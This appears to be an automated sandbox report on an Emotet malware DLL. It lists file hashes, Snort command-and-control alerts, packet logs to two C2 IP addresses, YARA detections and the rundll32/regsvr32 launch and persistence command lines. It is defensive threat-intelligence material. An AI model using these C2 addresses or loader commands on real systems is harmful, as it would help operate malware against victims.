                                                                                                        Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.]..w...................................................................................................................................................................................................................................................................................................................................................HvLE.>......G...........?.G...7...N_.M.........................hbin................p.\..,..........nk,....w................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....w....... ........................... .......Z.......................Root........lf......Root....nk ....w................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:
                                                                                                        Entropy (8bit):6.767616444278102
                                                                                                        TrID:
                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                                                        • Windows Screen Saver (13104/52) 1.29%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:YBfn5E3Dlw.dll
                                                                                                        File size:588288
                                                                                                        MD5:038f9a9d5b96733a9b3030cfbe4e4535
                                                                                                        SHA1:3b8a4b81f0b06514188e4f935d5f4b0858b93806
                                                                                                        SHA256:d46762ba155e3345baf5d9e9453e6cd8e0647438693abddf34f98ae8d6bd436a
                                                                                                        SHA512:3f9aea01963c0d9daa7739277fea7af2b3fe86c41a211fb73b2a35e9506856da91bc334a7c4e63ae83094fe696a8b45e8e5050240a1545e5f891fa4c22512671
                                                                                                        SSDEEP:6144:cNU5LwA22222GgngDrDRVyYli/ci2tEGW78ODQiERtvOSk5DKXOW14IkFxVFgY4E:x5w7YM/cYVV7EWOpOJyvnHtytFyQ
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.......................................^F......^P.n....^W.t....^Y......^A......^G......^B.....Rich....................PE..L..

                                                                                                        File Icon

                                                                                                        Icon Hash:71b018ccc6577131

                                                                                                        Network Behavior

                                                                                                        Snort IDS Alerts

                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        01/14/22-19:50:18.278585TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 174979080192.168.2.445.138.98.34
                                                                                                        01/14/22-19:50:19.639317TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20497918080192.168.2.469.16.218.101

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 14, 2022 19:50:18.278584957 CET4979080192.168.2.445.138.98.34
                                                                                                        Jan 14, 2022 19:50:18.295628071 CET804979045.138.98.34192.168.2.4
                                                                                                        Jan 14, 2022 19:50:18.870325089 CET4979080192.168.2.445.138.98.34
                                                                                                        Jan 14, 2022 19:50:18.887774944 CET804979045.138.98.34192.168.2.4
                                                                                                        Jan 14, 2022 19:50:19.573530912 CET4979080192.168.2.445.138.98.34
                                                                                                        Jan 14, 2022 19:50:19.590563059 CET804979045.138.98.34192.168.2.4
                                                                                                        Jan 14, 2022 19:50:19.639317036 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:19.765877962 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:19.766030073 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:19.794168949 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:19.920645952 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:19.933572054 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:19.933604002 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:19.933727026 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:24.897527933 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:25.023994923 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:25.031388044 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:25.031488895 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:25.037769079 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:25.164257050 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:25.677548885 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:25.678915977 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:50:28.678262949 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:28.678286076 CET80804979169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 19:50:28.678374052 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:52:08.193602085 CET497918080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 19:52:08.193706989 CET497918080192.168.2.469.16.218.101

                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        Analysis Process: loaddll32.exe PID: 6260 Parent PID: 5916

                                                                                                        General

                                                                                                        Start time:19:49:43
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll"
                                                                                                        Imagebase:0xef0000
                                                                                                        File size:116736 bytes
                                                                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.680031217.0000000002AE1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.703964616.0000000002AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.679124499.0000000002AE1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.679046535.0000000002AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.679999425.0000000002AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: cmd.exe PID: 2240 Parent PID: 6260

                                                                                                        General

                                                                                                        Start time:19:49:44
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1
                                                                                                        Imagebase:0x11d0000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: regsvr32.exe PID: 5396 Parent PID: 6260

                                                                                                        General

                                                                                                        Start time:19:49:44
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\YBfn5E3Dlw.dll
                                                                                                        Imagebase:0xcf0000
                                                                                                        File size:20992 bytes
                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.670153557.0000000000C61000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.670105180.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: rundll32.exe PID: 6072 Parent PID: 2240

                                                                                                        General

                                                                                                        Start time:19:49:44
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1
                                                                                                        Imagebase:0x12f0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.670630923.0000000001270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.670654175.00000000012A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: rundll32.exe PID: 1320 Parent PID: 6260

                                                                                                        General

                                                                                                        Start time:19:49:45
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\YBfn5E3Dlw.dll,DllRegisterServer
                                                                                                        Imagebase:0x12f0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.717791244.00000000047B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.717740715.0000000004780000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.716834900.00000000011C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.716329937.0000000000B21000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.717660130.0000000004720000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.715971380.00000000004F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.716952958.00000000011F1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.717702240.0000000004751000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: rundll32.exe PID: 6436 Parent PID: 5396

                                                                                                        General

                                                                                                        Start time:19:49:46
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServer
                                                                                                        Imagebase:0x12f0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: rundll32.exe PID: 4180 Parent PID: 6072

                                                                                                        General

                                                                                                        Start time:19:49:46
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServer
                                                                                                        Imagebase:0x12f0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.684992268.0000000003450000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.687871792.0000000005661000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.687254093.0000000005501000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.686420197.00000000053F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.688080295.0000000005690000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.687539122.0000000005630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.688465307.00000000059F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.688659098.0000000005A21000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.688152191.00000000056C1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.686930115.00000000054D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.685377727.0000000003601000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.686624450.0000000005421000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: svchost.exe PID: 6888 Parent PID: 568

                                                                                                        General

                                                                                                        Start time:19:49:50
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: WerFault.exe PID: 5628 Parent PID: 6888

                                                                                                        General

                                                                                                        Start time:19:49:50
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6260 -ip 6260
                                                                                                        Imagebase:0xd70000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: rundll32.exe PID: 6500 Parent PID: 4180

                                                                                                        General

                                                                                                        Start time:19:49:51
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Dfktehrjwgeevy\pakqi.bja",rArKTBwXKBsr
                                                                                                        Imagebase:0x12f0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.687070469.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.687321793.0000000000B81000.00000020.00000001.sdmp, Author: Joe Security

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: WerFault.exe PID: 6552 Parent PID: 6260

                                                                                                        General

                                                                                                        Start time:19:49:52
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 552
                                                                                                        Imagebase:0xd70000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: rundll32.exe PID: 6664 Parent PID: 6500

                                                                                                        General

                                                                                                        Start time:19:49:53
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Dfktehrjwgeevy\pakqi.bja",DllRegisterServer
                                                                                                        Imagebase:0x12f0000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: svchost.exe PID: 1368 Parent PID: 568

                                                                                                        General

                                                                                                        Start time:19:50:07
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: svchost.exe PID: 5416 Parent PID: 568

                                                                                                        General

                                                                                                        Start time:19:50:31
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Chronological Activities

                                                                                                        Analysis Process: svchost.exe PID: 7132 Parent PID: 568

                                                                                                        General

                                                                                                        Start time:19:50:44
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Chronological Activities

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >

                                                                                                          Analysis Process: loaddll32.exe PID: 6260 Parent PID: 5916 loaddll32.exeCOMMON

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:2.1%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:55.7%
                                                                                                          Total number of Nodes:1071
                                                                                                          Total number of Limit Nodes:7

                                                                                                          Graph

                                                                                                          execution_graph 4017 2ae1a2c 4018 2ae1a59 4017->4018 4019 2aeeb52 GetPEB 4018->4019 4020 2ae1aeb 4019->4020 4067 2afbefd 4080 2af09dd 4067->4080 4070 2b0061d 2 API calls 4071 2afc1b8 4070->4071 4079 2afc229 4071->4079 4084 2afe1f8 4071->4084 4073 2afc1d6 4074 2b02d0a GetPEB 4073->4074 4075 2afc1ff 4074->4075 4076 2affecb GetPEB 4075->4076 4077 2afc212 4076->4077 4088 2aed061 4077->4088 4081 2af09f3 4080->4081 4082 2aeeb52 GetPEB 4081->4082 4083 2af0a85 4082->4083 4083->4070 4085 2afe211 4084->4085 4086 2aec5d8 GetPEB 4085->4086 4087 2afe2da 4086->4087 4087->4073 4087->4087 4089 2aed07a 4088->4089 4090 2aeeb52 GetPEB 4089->4090 4091 2aed141 4090->4091 4091->4079 4117 2aef1cb 4122 2ae8636 4117->4122 4119 2aef26d 4120 2afd11a GetPEB 4119->4120 4121 2aef281 4120->4121 4125 2ae9ad5 4122->4125 4123 2aea3e5 4372 2af27f9 4123->4372 4125->4123 4126 2b00e63 GetPEB 4125->4126 4132 2aea3c7 4125->4132 4133 2aea3c5 4125->4133 4136 2af3d85 GetPEB 4125->4136 4153 2b02b09 GetPEB 4125->4153 4157 2affecb GetPEB 4125->4157 4159 2b01028 4125->4159 4163 2af4f74 4125->4163 4171 2af2142 4125->4171 4185 2ae670b 4125->4185 4193 2ae77a3 4125->4193 4198 2ae30e7 4125->4198 4203 2b02699 4125->4203 4207 2afbd13 4125->4207 4211 2afd1bc 4125->4211 4221 2aebdf9 4125->4221 4224 2af3eaa 4125->4224 4230 2aede74 4125->4230 4240 2afe955 4125->4240 4251 2ae4b5d 4125->4251 4254 2b02009 4125->4254 4265 2aec6b8 4125->4265 4278 2aed14c 4125->4278 4291 2afc5d5 4125->4291 4295 2affbde 4125->4295 4300 2af4a66 4125->4300 4310 2afad08 4125->4310 4320 2afc387 4125->4320 4325 2afe4e5 4125->4325 4337 2af9a01 4125->4337 4346 2af8d3d 4125->4346 4353 2aea445 4125->4353 4126->4125 4362 2b017bd 4132->4362 4133->4119 4136->4125 4153->4125 4157->4125 4160 2b01041 4159->4160 4161 2aeeb52 GetPEB 4160->4161 4162 2b010cd 4161->4162 4162->4125 4168 2af522f 4163->4168 4165 2af09dd GetPEB 4165->4168 4166 2af5328 4166->4125 4167 2afe1f8 GetPEB 4167->4168 4168->4165 4168->4166 4168->4167 4169 2b02d0a GetPEB 4168->4169 4170 2affecb GetPEB 4168->4170 4386 2af437a 4168->4386 4169->4168 4170->4168 4184 2af2628 4171->4184 4172 2afe1f8 GetPEB 4172->4184 4173 2af27af 4177 2b02b09 GetPEB 4173->4177 4174 2aec5d8 GetPEB 4174->4184 4176 2af2793 4422 2aef7fe 4176->4422 4178 2af27c9 4177->4178 4180 2b02b09 GetPEB 4178->4180 4183 2af2791 4180->4183 4181 2affecb GetPEB 4181->4184 4183->4125 4184->4172 4184->4173 4184->4174 4184->4176 4184->4181 4184->4183 4414 2af8b9e 4184->4414 4418 2ae738a 4184->4418 4189 2ae6a16 4185->4189 4187 2b00db1 GetPEB 4187->4189 4189->4187 4190 2ae6b43 4189->4190 4191 2b045ca GetPEB 4189->4191 4192 2b01538 GetPEB 4189->4192 4426 2afdbc1 4189->4426 4430 2afca1f 4189->4430 4190->4125 4191->4189 4192->4189 4194 2ae77cc 4193->4194 4195 2ae7e67 4194->4195 4196 2aec5d8 GetPEB 4194->4196 4197 2afcad5 GetPEB 4194->4197 4195->4125 4196->4194 4197->4194 4202 2ae31a7 4198->4202 4200 2ae325b 4200->4125 4202->4200 4434 2b0161b 4202->4434 4438 2b02a36 4202->4438 4204 2b026b3 4203->4204 4205 2b027a6 4204->4205 4206 2afff58 GetPEB 4204->4206 4205->4125 4206->4204 4208 2afbd2c 4207->4208 4209 2aeeb52 GetPEB 4208->4209 4210 2afbdd2 4209->4210 4210->4125 4217 2afd202 4211->4217 4213 2affe2a GetPEB 4213->4217 4214 2b02b09 GetPEB 4214->4217 4217->4213 4217->4214 4219 2afd8c2 4217->4219 4442 2ae6b7a 4217->4442 4450 2af5779 4217->4450 4462 2ae80c0 4217->4462 4472 2af2e5d 4217->4472 4490 2af67e6 4217->4490 4219->4125 4222 2aec5d8 GetPEB 4221->4222 4223 2aebe8c 4222->4223 4223->4125 4225 2af4051 4224->4225 4226 2af416b 4225->4226 4227 2af09dd GetPEB 4225->4227 4638 2aedd35 4225->4638 4641 2af0aba 4225->4641 4226->4125 4227->4225 4232 2aee069 4230->4232 4231 2aee1e6 4697 2ae54b6 4231->4697 4232->4231 4235 2aee1e4 4232->4235 4237 2b02b09 GetPEB 4232->4237 4239 2aec307 GetPEB 4232->4239 4682 2afe0f2 4232->4682 4686 2af8c7d 4232->4686 4690 2aff840 4232->4690 4235->4125 4237->4232 4239->4232 4246 2afedaa 4240->4246 4241 2b045ca GetPEB 4241->4246 4242 2afefc1 4243 2b01538 GetPEB 4242->4243 4244 2afefbf 4243->4244 4244->4125 4245 2afe1f8 GetPEB 4245->4246 4246->4241 4246->4242 4246->4244 4246->4245 4247 2b02d0a GetPEB 4246->4247 4249 2afca1f GetPEB 4246->4249 4250 2affecb GetPEB 4246->4250 4705 2b044ff 4246->4705 4247->4246 4249->4246 4250->4246 4252 2b01028 GetPEB 4251->4252 4253 2ae4bf5 4252->4253 4253->4125 4255 2ae556b GetPEB 4254->4255 4259 2b02465 4255->4259 4256 2b025bf 4716 2af654a 4256->4716 4257 2afe1f8 GetPEB 4257->4259 4259->4256 4259->4257 4260 2b02d0a GetPEB 4259->4260 4261 2b025bd 4259->4261 4264 2affecb GetPEB 4259->4264 4709 2aedc1b 4259->4709 4712 2b044ad 4259->4712 4260->4259 4261->4125 4264->4259 4267 2aecdac 4265->4267 4266 2afe1f8 GetPEB 4266->4267 4267->4266 4272 2aecdf0 4267->4272 4273 2ae1a34 GetPEB 4267->4273 4274 2aed05c 4267->4274 4276 2affecb GetPEB 4267->4276 4742 2af00c5 4267->4742 4746 2af2cd9 4267->4746 4750 2ae2dea 4267->4750 4754 2aef96f 4267->4754 4738 2ae53d0 4272->4738 4273->4267 4274->4274 4276->4267 4285 2aed807 4278->4285 4279 2aeda79 4281 2ae3046 GetPEB 4279->4281 4280 2ae1a34 GetPEB 4280->4285 4284 2aeda77 4281->4284 4284->4125 4285->4279 4285->4280 4285->4284 4286 2afe1f8 GetPEB 4285->4286 4289 2aef96f GetPEB 4285->4289 4290 2affecb GetPEB 4285->4290 4758 2ae3046 4285->4758 4762 2afb257 4285->4762 4775 2af7c4e 4285->4775 4779 2afe8b6 4285->4779 4286->4285 4289->4285 4290->4285 4293 2afc7d3 4291->4293 4292 2aedc1b GetPEB 4292->4293 4293->4292 4294 2afc8ad 4293->4294 4294->4125 4298 2affcf5 4295->4298 4297 2aec5d8 GetPEB 4297->4298 4298->4297 4299 2affd44 4298->4299 4799 2af9df5 4298->4799 4299->4125 4309 2af4ded 4300->4309 4301 2ae3046 GetPEB 4301->4309 4302 2ae1a34 GetPEB 4302->4309 4303 2aec5d8 GetPEB 4303->4309 4304 2af4f25 4306 2b00db1 GetPEB 4304->4306 4307 2af4f23 4306->4307 4307->4125 4308 2afe8b6 GetPEB 4308->4309 4309->4301 4309->4302 4309->4303 4309->4304 4309->4307 4309->4308 4828 2af07f4 4309->4828 4318 2afb06a 4310->4318 4311 2b00db1 GetPEB 4311->4318 4312 2afe1f8 GetPEB 4312->4318 4313 2afb173 4835 2af7a0f 4313->4835 4314 2af654a GetPEB 4314->4318 4315 2b02d0a GetPEB 4315->4318 4316 2afb171 4316->4125 4318->4311 4318->4312 4318->4313 4318->4314 4318->4315 4318->4316 4319 2affecb GetPEB 4318->4319 4319->4318 4321 2ae556b GetPEB 4320->4321 4322 2afc401 4321->4322 4845 2afb19c 4322->4845 4328 2afe50b 4325->4328 4329 2aec5d8 GetPEB 4328->4329 4333 2afe8a9 4328->4333 4849 2af7d5b 4328->4849 4869 2b000ef 4328->4869 4881 2aeb820 4328->4881 4888 